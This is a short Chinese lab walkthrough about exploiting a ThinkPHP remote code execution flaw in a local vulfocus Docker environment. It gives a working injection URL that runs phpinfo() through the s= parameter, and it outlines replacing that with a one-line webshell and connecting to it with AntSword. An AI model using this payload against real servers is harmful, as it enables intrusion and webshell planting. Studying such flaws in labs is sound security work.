thinkphp框架远程代码执行

凌晨五点的星2024-07-31 11:30

一、环境

vulfocus网上自行下载

启动命令:

复制代码 
 docker run -d --privileged -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.131.144  8e55f85571c8

一定添加--privileged不然只能拉取环境首页不显示

二、thinkphp远程代码执行

首页:

先开始资产收集:

端口:

目录:

网上搜索历史cve

输入pyload

复制代码 
http://192.168.131.144:29319/index.php?s=/index/index/name/${@phpinfo()})

命令执行

使用bp抓包

替换成一句话木马

使用蚁剑去连接

相关推荐
Bl_a_ck40 分钟前
--openssl-legacy-provider is not allowed in NODE_OPTIONS 报错的处理方式
开发语言·前端·web安全·网络安全·前端框架·ssl
神经毒素13 小时前
WEB安全--RCE--webshell bypass2
安全·web安全
Johnstons15 小时前
AnaTraf:深度解析网络性能分析(NPM)
前端·网络·安全·web安全·npm·网络流量监控·网络流量分析
网络空间小黑15 小时前
常见WEB漏洞----暴力破解
计算机网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
第十六年盛夏.21 小时前
【网络安全】SQL注入
sql·web安全·网络安全
网络空间小黑1 天前
WEB渗透测试----信息收集
服务器·前端·网络·安全·web安全·网络安全
上海云盾商务经理杨杨1 天前
2025年网站安全防御全解析:应对DDoS与CC攻击的智能策略
安全·web安全·网络安全·ddos
一口一个橘子2 天前
[ctfshow web入门] web69
前端·web安全·网络安全
毒果2 天前
网络安全:账号密码与诈骗防范
网络·安全·web安全
大刘讲IT2 天前
IT/OT 融合架构下的工业控制系统安全攻防实战研究
经验分享·安全·web安全·架构·制造
热门推荐
01YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03KGG转MP3工具|非KGM文件|解密音频04组基轨迹建模 GBTM的介绍与实现(Stata 或 R)05【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!06Coze扣子平台完整体验和实践(附国内和国际版对比)07YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU08yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记09DeepSeek各版本说明与优缺点分析10【解决】Android Gradle Sync 报错 Could not read workspace metadata